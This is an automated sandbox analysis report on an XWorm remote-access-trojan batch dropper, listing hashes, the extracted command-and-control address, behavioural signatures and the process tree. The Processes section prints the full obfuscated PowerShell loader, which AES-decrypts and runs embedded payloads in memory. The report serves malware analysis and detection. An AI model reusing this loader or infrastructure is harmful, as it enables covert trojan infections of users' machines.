Analysis
- max time kernel: 913s
- max time network: 1156s
- platform: windows11-21h2_x64
- resource: win11-20241007-en
- resource tags: arch:x64, arch:x86, image:win11-20241007-en, locale:en-us, os:windows11-21h2-x64, system
- submitted: 09/11/2024, 17:28
Static task
static1
General
- Target: ssssss.bat
- Size: 293KB
- MD5: 55045f48b34f00088c49b229bc07c30e
- SHA1: f875cce5c12e06899b39223e040cad9f46ada1cd
- SHA256: ad7c1c54dbc4a02faa20044c37c24478923ca1cc17989429caf059cc622eb95e
- SHA512: 549512c75fc5089cb7d4b41e3b55dde60ae253232f4ea7aed25296ebe6f16e6cc5d9fac8284240d23e060a6770514473eb29a81d5a6041ea43bf6d28f163ee7d
- SSDEEP: 3072:YIeH8waTPggAXw95luaeejSSb6wM7wXgfYM8J2Q3nfWvSYD5y6wHh9+nxMKi1/TM:gHbWAXnevGR6f2QvFIyD9+K/TvXum6
Malware Config
Extracted
xworm
- 149.40.62.55:60447
- Install_directory: %AppData%
- install_file: System User.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource | yara_rule
behavioral1/memory/448-15-0x0000021BE1F20000-0x0000021BE1F38000-memory.dmp | family_xworm
-
Xworm family
-
Blocklisted process makes network request 1 IoCs
flow | pid | Process
2 | 448 | powershell.exe
-
A potential corporate email address has been identified in the URL: A8AB776A5245B4220A490D44@AdobeOrg
-
A potential corporate email address has been identified in the URL: CF4957F555EE9B727F000101@AdobeOrg
-
A potential corporate email address has been identified in the URL: [email protected]
-
pid | Process
448 | powershell.exe
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
1 | ip-api.com
-
Enumerates system info in registry 2 TTPs 3 IoCs
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
-
Modifies registry class 5 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\MuiCache | MiniSearchHost.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | BackgroundTransferHost.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | BackgroundTransferHost.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" | BackgroundTransferHost.exe
Key created | \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\MuiCache | BackgroundTransferHost.exe
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid | Process
448 | powershell.exe
448 | powershell.exe
2440 | msedge.exe
2440 | msedge.exe
4952 | msedge.exe
4952 | msedge.exe
3692 | msedge.exe
3692 | msedge.exe
1912 | identity_helper.exe
1912 | identity_helper.exe
1908 | msedge.exe
1908 | msedge.exe
1908 | msedge.exe
1908 | msedge.exe
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 21 IoCs
pid | Process
2440 | msedge.exe (all 21 entries)
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
description | pid | Process
Token: SeDebugPrivilege | 448 | powershell.exe
Token: 33 | 3152 | AUDIODG.EXE
Token: SeIncBasePriorityPrivilege | 3152 | AUDIODG.EXE
-
Suspicious use of FindShellTrayWindow 26 IoCs
pid | Process
2440 | msedge.exe (all 26 entries)
-
Suspicious use of SendNotifyMessage 12 IoCs
pid | Process
2440 | msedge.exe (all 12 entries)
-
Suspicious use of SetWindowsHookEx 1 IoCs
pid | Process
5040 | MiniSearchHost.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 4276 wrote to memory of 448 | 4276 | cmd.exe | 81
PID 4276 wrote to memory of 448 | 4276 | cmd.exe | 81
PID 2440 wrote to memory of 4220 | 2440 | msedge.exe | 90
PID 2440 wrote to memory of 4220 | 2440 | msedge.exe | 90
PID 2440 wrote to memory of 4832 | 2440 | msedge.exe | 91
PID 2440 wrote to memory of 4952 | 2440 | msedge.exe | 92
PID 2440 wrote to memory of 4952 | 2440 | msedge.exe | 92
PID 2440 wrote to memory of 1884 | 2440 | msedge.exe | 93
The 4832 and 1884 rows recur many times in the report; together they make up the remaining 58 of the 64 entries.
Processes
-
C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ssssss.bat"
  - Suspicious use of WriteProcessMemory
  PID: 4276
  -
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nm1BOIVwFMg62nJj+FT46gafirK1QerzAciTsV/QolM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jX3hxWDIqv2IN+tBy0WraA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $eHbKp=New-Object System.IO.MemoryStream(,$param_var); $WQnGV=New-Object System.IO.MemoryStream; $ghfCO=New-Object System.IO.Compression.GZipStream($eHbKp, [IO.Compression.CompressionMode]::Decompress); $ghfCO.CopyTo($WQnGV); $ghfCO.Dispose(); $eHbKp.Dispose(); $WQnGV.Dispose(); $WQnGV.ToArray();}function execute_function($param_var,$param2_var){ $yhsic=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GuzyD=$yhsic.EntryPoint; $GuzyD.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ssssss.bat';$KwMeq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ssssss.bat').Split([Environment]::NewLine);foreach ($hxuMo in $KwMeq) { if ($hxuMo.StartsWith(':: ')) { $ZEAAE=$hxuMo.Substring(3); break; }}$payloads_var=[string[]]$ZEAAE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 448
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID: 2440
  -
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffb95473cb8,0x7ffb95473cc8,0x7ffb95473cd8
      PID: 4220
  -
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1832 /prefetch:2
      PID: 4832
  -
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3
      - Suspicious behavior: EnumeratesProcesses
      PID: 4952
  -
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2564 /prefetch:8
      PID: 1884
  -
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
      PID: 2304
  -
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
      PID: 1540
  -
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4092 /prefetch:1
      PID: 1680
  -
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:1
      PID: 4892
  -
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
      PID: 3692
  -
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4088 /prefetch:1
      PID: 1512
  -
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5332 /prefetch:1
      PID: 936
  -
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
      PID: 4524
  -
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:1
      PID: 2272
  -
    C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5716 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
      PID: 1912
  -
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:1
      PID: 2708
  -
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4540 /prefetch:1
      PID: 4052
  -
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:1
      PID: 4944
  -
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4112 /prefetch:1
      PID: 444
  -
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4720 /prefetch:8
      PID: 2164
  -
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:1
      PID: 416
  -
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6084 /prefetch:1
      PID: 3788
  -
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:1
      PID: 4796
  -
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6344 /prefetch:1
      PID: 4112
  -
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6612 /prefetch:1
      PID: 4904
  -
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6544 /prefetch:1
      PID: 4748
  -
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:1
      PID: 1548
  -
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6820 /prefetch:1
      PID: 3184
  -
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:1
      PID: 2320
  -
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2892 /prefetch:2
      - Suspicious behavior: EnumeratesProcesses
      PID: 1908
-
C:\Windows\System32\CompPkgSrv.exe
  C:\Windows\System32\CompPkgSrv.exe -Embedding
  PID: 4816
-
C:\Windows\System32\CompPkgSrv.exe
  C:\Windows\System32\CompPkgSrv.exe -Embedding
  PID: 4520
-
C:\Windows\system32\AUDIODG.EXE
  C:\Windows\system32\AUDIODG.EXE 0x00000000000004C8 0x00000000000004B8
  - Suspicious use of AdjustPrivilegeToken
  PID: 3152
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
  "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID: 5040
-
C:\Windows\system32\BackgroundTransferHost.exe
  "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
  - Modifies registry class
  PID: 2036
-
C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
  PID: 908